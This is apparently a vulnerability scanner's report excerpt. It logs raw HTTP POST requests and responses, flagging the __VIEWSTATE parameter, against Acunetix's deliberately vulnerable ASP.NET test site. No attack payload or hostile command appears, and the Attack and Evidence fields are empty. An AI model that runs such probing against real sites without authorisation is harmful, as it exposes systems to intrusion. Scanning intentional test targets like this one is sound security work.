Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8304&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgBAKA5Sn9oIZGRk1d%2F4hXZ2PEhNaU%2FJIkz1j5eCmnU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLA6tbdAgLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gL7rPHKCMfP3Nlh%2BdCdfkMzeQzcAw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:45:02 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgBAKA5Sn9oIZGRk1d/4hXZ2PEhNaU/JIkz1j5eCmnU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLA6tbdAgLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gL7rPHKCMfP3Nlh+dCdfkMzeQzcAw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:White" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8320&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgBAxLTkq9oIZGRkletBeJ6rja%2FKYjdNwwSI52U1RQo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLqt6%2FjAQLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gJBpmQ0Lk828D1B9EjCpx58bHXzEw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:26:20 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgBAxLTkq9oIZGRkletBeJ6rja/KYjdNwwSI52U1RQo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLqt6/jAQLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gJBpmQ0Lk828D1B9EjCpx58bHXzEw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:White" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
